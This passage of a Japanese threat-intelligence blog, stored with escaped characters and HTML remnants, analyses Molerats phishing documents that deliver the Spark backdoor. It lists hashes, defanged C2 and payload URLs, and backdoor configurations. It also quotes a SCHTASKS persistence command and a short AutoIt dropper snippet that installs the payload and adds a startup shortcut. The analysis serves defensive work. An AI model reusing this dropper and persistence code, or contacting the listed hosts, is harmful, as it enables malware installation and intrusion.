\u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073C2\u30ea\u30af\u30a8\u30b9\u30c8\u306e\u30c1\u30a7\u30fc\u30f3\u306f\u304d\u308f\u3081\u3066\u4e00\u822c\u7684\u3067\u3001DarkHydrus\u3084Sofacy\u306a\u3069\u306e\u3055\u307e\u3056\u307e\u306a\u653b\u6483\u8005\u306b\u3088\u308b\u4f7f\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u52d5\u4f5c\u3067\u306f\u3001\u653b\u6483\u6642\u306b\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5c55\u958b\u3057\u3001\u4eca\u5f8c\u306e\u5206\u6790\u306b\u4f7f\u7528\u3067\u304d\u308b\u8ffd\u52a0\u306e\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u3092\u56de\u907f\u3067\u304d\u308b\u305f\u3081\u3001\u653b\u6483\u8005\u304c\u81ea\u52d5\u5316\u3055\u308c\u305f\u9632\u5fa1\u7b56\u3092\u56de\u907f\u3059\u308b\u306e\u306b\u5f79\u7acb\u3061\u307e\u3059\u3002<\/p>\n

<\/a>\u6dfb\u4ed8\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8<\/h2>\n

2019\u5e7410\u670831\u65e5\u306811\u67082\u65e5\u306b\u914d\u4fe1\u3055\u308c\u305fWord\u6587\u66f8(SHA256: eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000)\u306b\u306fattachment.doc\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u4ed8\u3044\u3066\u304a\u308a\u3001\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e\"\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u6709\u52b9\u5316\"\u30dc\u30bf\u30f3\u3092\u53d7\u4fe1\u8005\u304c\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8a98\u5c0e\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u56f32\u306f\u3001\u53d7\u4fe1\u8005\u304c\"\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u6709\u52b9\u5316\"\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8a98\u5c0e\u3059\u308b\u3068\u304d\u306b\u4f7f\u7528\u3055\u308c\u308b\u30eb\u30a2\u30fc\u753b\u50cf\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u6587\u66f8\u306f\u3001\u524d\u8ff0\u3057\u305fMOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3067\u3057\u305f\u3002<\/p>\n

\"Figure<\/span><\/p>\n

\u56f32. \u6dfb\u4ed8\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8\u5185\u306e\u30eb\u30a2\u30fc\u753b\u50cf<\/span><\/p>\n

\u3053\u306e\u30de\u30af\u30ed\u306f\u975e\u5e38\u306b\u5358\u7d14\u3067\u3059\u3002\u6b21\u306eGoogle\u30c9\u30e9\u30a4\u30d6\u306eURL\u304b\u3089base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u30c7\u30b3\u30fc\u30c9\u3057\u3066%TEMP%\\rundll64.exe\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n

hxxps:\/\/drive.google[.]com\/uc?export=download&id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH<\/span><\/p>\n

\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128P)\u306f\u3001%userprofile%\\runawy.exe\u306b\u57cb\u3081\u8fbc\u307f\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u5b9f\u884c\u3059\u308b\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3059\u3002AutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u7d42\u4e86\u3059\u308b\u524d\u306b\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30b9\u30bf\u30fc\u30c8\u30a2\u30c3\u30d7 \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u30b3\u30d4\u30fc\u3057\u3001\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3059\u308b\u3053\u3068\u3067\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u304c\u5b9f\u884c\u3057\u7d9a\u3051\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n

SCHTASKS \/Create \/f \/SC minute \/TN \"runawy\" \/mo 5 \/tr \"%userprofile%\\runawy.exe\"<\/span><\/p>\n

runawy.exe\u30d5\u30a1\u30a4\u30eb(SHA256:64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431)\u306f\u3001\"S4.4P\"\u306e\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f5c\u6210\u3059\u308bEnigma\u3067\u30d1\u30c3\u30af\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3059\u3002\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30d1\u30c3\u30af\u3055\u308c\u305f\u4e9c\u7a2e\u3067\u3001Molerats\u306b\u6392\u4ed6\u7684\u306b\u30ea\u30f3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u8a73\u7d30\u306a\u6a5f\u80fd\u306b\u3064\u3044\u3066\u306f\u3001\u3053\u306e\u30d6\u30ed\u30b0\u306e\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u304c\u3001\u7279\u5b9a\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u69cb\u6210\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n

{\"sIt\":\"nysura[.]com\",\"QrU\":\"\/\",\"JJDF\":80,\"MJOu\":0,\"TuS\":\"\",\"pJhC\":1,\"Lm\":\"NMRm3AlaGUeT2g9iA2lNTIk04vSj8r2IBUDEvItgOxw=\",\"LPO\":10000}<\/span><\/p>\n

<\/a>Pictures.PDF\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8<\/h2>\n

\u524d\u8ff0\u306e2\u3064\u306eWord\u6587\u66f8\u3068\u306f\u5225\u306b\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306b \u0635\u0648\u0631\u0643 <\u7de8\u96c6\u6e08\u307f>\u0645\u0639 \u0647\u0628\u0629 (\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u3001\u5927\u307e\u304b\u306a\u610f\u5473\u306f\"Heba\u3068\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\")\u3068\u3044\u3046\u4ef6\u540d\u3067\u6dfb\u4ed8\u3055\u308c\u305f\"Pictures.pdf\" (SHA256:9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495)\u3068\u3044\u3046\u540d\u524d\u306ePDF\u6587\u66f8\u3092\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u3053\u306ePDF\u6587\u66f8\u306f\u8106\u5f31\u6027\u3092\u7a81\u304f\u3082\u306e\u3067\u306f\u306a\u304f\u3001\u653b\u6483\u8005\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u53d7\u4fe1\u8005\u3092\u8105\u3059\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u3053\u306ePDF\u6587\u66f8\u306f\u3001\u5de7\u5999\u306a\u30eb\u30a2\u30fc\u753b\u50cf\u3068\u6b20\u843d\u3057\u305f\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u4f7f\u7528\u3057\u3066\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3059\u308b\u3088\u3046\u30e6\u30fc\u30b6\u30fc\u3092\u8a98\u5c0e\u3059\u308bWord\u306e\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u3001\u8105\u8feb\u3068\u3082\u8a00\u3048\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u542b\u307e\u308c\u305f\u3088\u308a\u539a\u304b\u307e\u3057\u3044\u30a2\u30d7\u30ed\u30fc\u30c1\u3092\u4f7f\u7528\u3057\u3066\u30e6\u30fc\u30b6\u30fc\u306b\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3055\u305b\u3001RAR\u30a2\u30fc\u30ab\u30a4\u30d6\u3092\u958b\u3044\u3066\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u5b9f\u884c\u3055\u305b\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n

PDF\u6587\u66f8\u5185\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u66f8\u304b\u308c\u3066\u304a\u308a\u3001\u9001\u4fe1\u8005\u304c\u53d7\u4fe1\u8005\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u3092\u6240\u6301\u3057\u3066\u3044\u3066\u3001\u305d\u308c\u3092\u30de\u30b9\u30b3\u30df\u306b\u516c\u958b\u3059\u308b\u3068\u307b\u306e\u3081\u304b\u3057\u3066\u3044\u307e\u3059\u3002\u30e1\u30c3\u30bb\u30fc\u30b8\u306b\u306f\u3001\u3053\u306e\u6587\u66f8\u304c\u653f\u5e9c\u95a2\u4fc2\u306e\u540c\u50da\u306b\u3082\u9001\u4fe1\u3055\u308c\u305f\u3053\u3068\u304c\u793a\u3055\u308c\u3001\u88ab\u5bb3\u8005\u306b\u6587\u66f8\u5185\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8105\u3057\u3066\u3044\u307e\u3059\u3002\u56f33\u306f\u3001PDF\u6587\u66f8\u5185\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n

\"Figure<\/span><\/p>\n

\u56f33. \u60aa\u610f\u306e\u3042\u308bPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8<\/span><\/p>\n

\u6587\u66f8\u5185\u306e\u30ea\u30f3\u30af\u306f\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u66f8\u304b\u308c\u3066\u304a\u308a\u3001\u5927\u307e\u304b\u306a\u8a33\u306f\"Heba\u3068\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u306e\u4e00\u4f8b\"\u304a\u3088\u3073\"\u5199\u771f\"\u3067\u3059\u3002\u3053\u306e\u30ea\u30f3\u30af\u306f\u3001\u6b21\u306eURL(\u5927\u6587\u5b57\/\u5c0f\u6587\u5b57\u3092\u533a\u5225)\u3092\u6307\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n

hxxps:\/\/zmartco[.]com\/Pictures.rar<\/span><\/p>\n

\"Pictures.rar\"\u30d5\u30a1\u30a4\u30eb(SHA256: 1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da)\u306fRAR\u30a2\u30fc\u30ab\u30a4\u30d6\u3067\u3001\u3053\u308c\u306b\u306f\u0647\u0630\u0647 \u0639\u064a\u0646\u0629 \u0642\u0644\u064a\u0644\u0629 \u0645\u0646 \u0627\u0644\u0635\u0648\u0631.exe (SHA256: 92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7)\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u30d5\u30a1\u30a4\u30eb\u304c1\u3064\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u5927\u307e\u304b\u306b\u8a33\u3059\u3068\u3001\"\u3053\u308c\u306f\u5199\u771f\u306e\u4e00\u90e8\u3067\u3059.exe\"\u3068\u306a\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3001\u57cb\u3081\u8fbc\u307f\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u5c55\u958b\u3057\u3066\u30c7\u30a3\u30b9\u30af\u306eC:\\Users\\Public\\pdf.exe (SHA256: 5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3)\u306b\u4fdd\u5b58\u3057\u3001\u30b9\u30bf\u30fc\u30c8 \u30e1\u30cb\u30e5\u30fc\\\u30d7\u30ed\u30b0\u30e9\u30e0\\\u30b9\u30bf\u30fc\u30c8\u30a2\u30c3\u30d7\\pdf.lnk \u306b\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u3092\u4f5c\u6210\u3057\u3066\u3001\u6b21\u306e\u3088\u3046\u306b\u30b7\u30b9\u30c6\u30e0\u304c\u8d77\u52d5\u3059\u308b\u305f\u3073\u306b\u81ea\u52d5\u3067\u5b9f\u884c\u3055\u308c\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n

#NoTrayIcon\r\nFileInstall(\"pdf.exe\", \"C:\\Users\\Public\\\" & \"\/pdf.exe\")\r\n$cmd1 = \"C:\\Users\\Public\\\" & \"\\pdf.exe\"\r\nRunWait(@ComSpec & \" \/c start \" & $cmd1, \"\", @SW_HIDE)\r\nFileCreateShortcut(\"C:\\Users\\Public\\\" & \"\\pdf.exe\", @StartupDir & \r\n\"\\pdf.lnk\")\r\n<\/pre>\n
attachment.doc\u3068\u3044\u3046Word\u6587\u66f8\u306b\u3088\u3063\u3066\u914d\u4fe1\u3055\u308c\u305f\"runawy.exe\"\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u540c\u69d8\u306b\u3001\u30b7\u30b9\u30c6\u30e0\u306b\u4fdd\u5b58\u3055\u308c\u305f\"pdf.exe\"\u30d5\u30a1\u30a4\u30eb\u306f\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30d1\u30c3\u30af\u3055\u308c\u305f\u4e9c\u7a2e\u3067\u3059\u3002\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u4e9c\u7a2e\u306e\u69cb\u6210\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n
{\"xBql\":\"laceibagrafica[.]com\",\"eauy\":\"\/\",\"Qnd\":80,\"jJN\":0,\"rlOa\":\"\",\"Eb\":1,\"BGa\":\"vcJbq6nzgJk=\",\"qJk\":10000}<\/span><\/p>\n
<\/a>\u914d\u4fe1\u306e\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/h2>\n
\u3053\u306e\u3088\u3046\u306a\u653b\u6483\u3092\u8abf\u67fb\u3059\u308b\u969b\u3001\u518d\u5229\u7528\u3055\u308c\u3066\u3044\u308bIP\u30a2\u30c9\u30ec\u30b9\u3084\u30c9\u30e1\u30a4\u30f3\u3092\u8ffd\u8de1\u3057\u305f\u308a\u3001\u985e\u4f3c\u306e\u5c5e\u6027\u3092\u5171\u6709\u3057\u3066\u3044\u308b\u95a2\u9023\u30c9\u30e1\u30a4\u30f3\u3092\u63a2\u3059\u306a\u3069\u306b\u3088\u308a\u3001\u500b\u5225\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u9593\u306e\u30ea\u30f3\u30af\u3092\u5bb9\u6613\u306b\u898b\u3064\u3051\u3089\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\u88681\u306b\u793a\u3059MOFA\u95a2\u9023\u306e\u3059\u3079\u3066\u306e\u914d\u4fe1\u6587\u66f8\u3067\u306f\u3001\u4f7f\u7528\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306fservicebios[.]com\u3060\u3051\u3067\u3001\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u60c5\u5831\u306e\u307b\u3068\u3093\u3069\u304c\u904e\u53bb\u306b\u4f7f\u7528\u3055\u308c\u305f\u3082\u306e\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n
\u8ffd\u52a0\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u95a2\u9023\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u78ba\u8a8d\u304a\u3088\u3073\u767a\u898b\u3059\u308b\u3053\u3068\u3092\u76ee\u7684\u3068\u3057\u305f\u524d\u8ff0\u306e\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u306e\u5206\u6790\u3067\u306f\u3001AutoFocus Threat Intelligence\u30b5\u30fc\u30d3\u30b9\u3067\u3001\u30af\u30e9\u30a6\u30c9 \u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306eWildFire\u3067\u63d0\u4f9b\u3055\u308c\u305f\u4ee3\u66ff\u306e\u30c7\u30fc\u30bf \u30dd\u30a4\u30f3\u30c8\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u5f0a\u793e\u304c\u4f7f\u7528\u3057\u305f\u65b9\u6cd5\u3068\u8ffd\u52a0\u306e\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n
\u4ee5\u4e0b\u306e\u56f34\u306f\u3001\u56f3\u306e\u4e0b\u534a\u5206\u306b\u3042\u308bservicebios[.]com\u30c9\u30e1\u30a4\u30f3\u306b\u95a2\u9023\u3059\u308bWord\u6587\u66f8\u3068Visual Basic Script (vbs)\u30d5\u30a1\u30a4\u30eb\u3092\u8868\u3057\u305fMaltego\u56f3\u3067\u3059\u3002\u95a2\u9023\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u306e\u4e00\u90e8\u306f\u30012\u3064\u306e\u30ea\u30f3\u30af\u306e\u3046\u3061\u306e1\u3064\u3092\u4ecb\u3057\u3066\u3001\u56f3\u306e\u4e0a\u534a\u5206\u306e\u5225\u306e\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u306b\u63a5\u7d9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30ea\u30f3\u30af\u306b\u306f\u3001\u9752\u3044\u30dc\u30c3\u30af\u30b9\u306eYara\u30b7\u30b0\u30cd\u30c1\u30e3\u3068\u3001AutoFocus\u3092\u610f\u5473\u3059\u308b\"AF\"\u3067\u793a\u3055\u308c\u305f\u30aa\u30ec\u30f3\u30b8\u8272\u306e\u30dc\u30c3\u30af\u30b9\u5185\u306eAutoFocus\u30af\u30a8\u30ea\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n
\"Figure<\/span><\/p>\n
\u56f34. \u914d\u4fe1\u6587\u66f8\u3068\u95a2\u9023\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u95a2\u4fc2\u3092\u793a\u3059\u56f3<\/span><\/p>\n
AutoFocus\u30af\u30a8\u30ea\u306f\u3001Windows Scripting Host\u30d7\u30ed\u30bb\u30b9(wscript.exe)\u3067\u60aa\u610f\u306e\u3042\u308bVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc \u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8d77\u52d5\u3055\u305b\u308b\u7279\u5b9a\u306e\u30d7\u30ed\u30bb\u30b9\u5b9f\u884c\u30c1\u30a7\u30fc\u30f3\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001\"MOFA- 101019.doc\" (SHA256: ddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8)\u6587\u66f8\u304b\u3089\u3001\u3053\u308c\u307e\u3067\u898b\u904e\u3054\u3055\u308c\u3066\u304d\u305f\u6587\u66f8\"\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u064a\u0648\u0645\u064a \u062d\u0648\u0644 \u0623\u0647\u0645 \u0627\u0644\u0645\u0633\u062a\u062c\u062f\u0627\u062a \u0627\u0644\u0641\u0644\u0633\u0637\u064a\u0646\u064a\u0629 \u0644\u064a\u0648\u0645 \u2013 9 \u2013 9 \u2013 2019.doc\" (\u6700\u3082\u91cd\u8981\u306a\u30d1\u30ec\u30b9\u30c1\u30ca\u306e\u958b\u767a\u306b\u95a2\u3059\u308b\u65e5\u6b21\u30ec\u30dd\u30fc\u30c8\u30019-9-2019.doc\u3001SHA256: feec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21)\u304a\u3088\u3073\"\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u064a\u0648\u0645\u064a \u062d\u0648\u0644 \u0623\u062e\u0631 \u0645\u0633\u062a\u062c\u062f\u0627\u062a \u0627\u0644\u0625\u0631\u0647\u0627\u0628 \u0627\u0644\u0639\u0627\u0644\u0645\u064a- 9 \u2013 9 \u2013 2019.doc\" (\u6700\u65b0\u306e\u30c6\u30ed\u30ec\u30dd\u30fc\u30c8\u306b\u95a2\u3059\u308b\u65e5\u6b21\u66f4\u65b0Alaalmi- 9 \u2013 9 \u2013 2019.doc\u3001SHA256: bf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959)\u306e\u6319\u52d5\u306e\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u3092\u78ba\u8a8d\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n
\u5143\u306eWord\u6587\u66f8\u3068\u540c\u69d8\u306b\u3001\u65b0\u898f\u6587\u66f8\u5185\u306eVBA\u30de\u30af\u30ed \u30b3\u30fc\u30c9\u3067\u3082\u3001Motobit<\/a>\u304b\u3089\u306e\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306e\"Base64\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fVBS\u95a2\u6570\"\u3092\u4f7f\u7528\u3057\u3066\u3001\u5b9f\u884c\u524d\u306b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u95a2\u6570\u304a\u3088\u3073VBS\u3078\u306eURL\u3092\u30c7\u30b3\u30fc\u30c9(T1027<\/a>)\u3057\u3066\u3044\u307e\u3057\u305f\u3002VBS\u30d5\u30a1\u30a4\u30eb\u9593\u3067\u306e\u4e3b\u306a\u9055\u3044\u306f\u3001\u30c9\u30e1\u30a4\u30f3(dapoerwedding[.]com)\u3067\u306f\u30012\u756a\u76ee\u306eVBS\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3067\u3059\u3002\u3053\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306e\u6642\u70b9\u3067\u306f\u3001\u30c9\u30e1\u30a4\u30f3\u306f45.15.168[.]118\u306b\u89e3\u6c7a\u3055\u308c\u30012019\u5e749\u6708\u304b\u3089\u306e\u4ee5\u524d\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n
\u6319\u52d5\u306e\u5171\u901a\u70b9\u3092\u4f7f\u7528\u3057\u305f\u95a2\u9023\u30d5\u30a1\u30a4\u30eb\u306e\u691c\u7d22\u3068\u4e26\u884c\u3057\u3066\u3001\u5f0a\u793e\u3067\u306f\u5143\u306e\u914d\u4fe1\u6587\u66f8\u306b\u95a2\u9023\u3057\u305fVBS\u30b3\u30fc\u30c9\u7528\u306eYara\u30b7\u30b0\u30cd\u30c1\u30e3\u3092\u4f5c\u6210\u3057\u3001\u5f0a\u793e\u304a\u3088\u3073VirusTotal\u306e\u30b3\u30fc\u30d1\u30b9\u3092\u30b9\u30ad\u30e3\u30f3\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u3088\u308a\u3001\u6b21\u306e2\u3064\u306e\u8ffd\u52a0\u306eVBS\u30d5\u30a1\u30a4\u30eb\u304c\u767a\u898b\u3055\u308c\u307e\u3057\u305f\u3002SHA256: 85631021d7e84dc466b23cf77dd949ebc61011a52c1f0fb046cfd62dd9192a15\u306f\u3001\u7b2c\u4e00\u6bb5\u968e\u306eVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3092\u8868\u3057\u307e\u3059\u3002\u6b21\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u308c\u306b\u306f\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c9\u30e1\u30a4\u30f3\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u540d\u3078\u306e\u30de\u30a4\u30ca\u30fc\u306a\u5909\u66f4\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n
https:\/\/dapoerwedding[.]com\/GoogleChrome.vbs<\/span><\/p>\n
\u767a\u898b\u3055\u308c\u305f2\u756a\u76ee\u306eVBS\u30d5\u30a1\u30a4\u30eb(SHA256: 9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7)\u306f\u3001\u6700\u7d42\u306eMSI\u30d5\u30a1\u30a4\u30eb \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u95a2\u3059\u308b\u7b2c\u4e8c\u6bb5\u968e\u306eVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3067\u3059\u3002\u3053\u308c\u306f\u3001\u57f7\u7b46\u6642\u70b9\u3067\u306f\u5165\u624b\u3067\u304d\u306a\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n
https:\/\/dapoerwedding[.]com\/GoogleChrome.msi<\/span><\/p>\n
\u3055\u3089\u306b\u3001\u5225\u306eAutoFocus\u30af\u30a8\u30ea\u3092\u4f7f\u7528\u3057\u305f\u8ffd\u52a0\u306eWord\u6587\u66f8(\u4e0a\u8a18\u306e\u56f34\u3067\u30aa\u30ec\u30f3\u30b8\u8272\u306e\u30dc\u30c3\u30af\u30b9\u3067\u5f37\u8abf\u8868\u793a\u3055\u308c\u305f\u4ed6\u306e2\u3064\u306eAutoFocus \"AF\")\u3092\u767a\u898b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306eMaltego\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u3067\u306f\u3001\u5143\u306e\u6587\u66f8\u306eVBA\u30de\u30af\u30ed \u30b3\u30fc\u30c9\u304b\u3089\u8a08\u7b97\u3057\u305f\u72ec\u81ea\u306e\u30cf\u30c3\u30b7\u30e5\u3092\u4f7f\u7528\u3057\u3066\u3001\u30c7\u30fc\u30bf\u3092\u30af\u30a8\u30ea\u3057\u307e\u3059\u3002\u305d\u306e\u7d50\u679c\u304c\u3001SHA256: 602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb (servicebios[.]com)\u3001SHA256: a2c68da1b3e0115f5804a55768b2baf50faea81f13a16e563411754dc6c0a8ff\u304a\u3088\u30734f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba (dapoerwedding[.]com)\u3068\u306a\u308a\u307e\u3059\u3002<\/p>\n
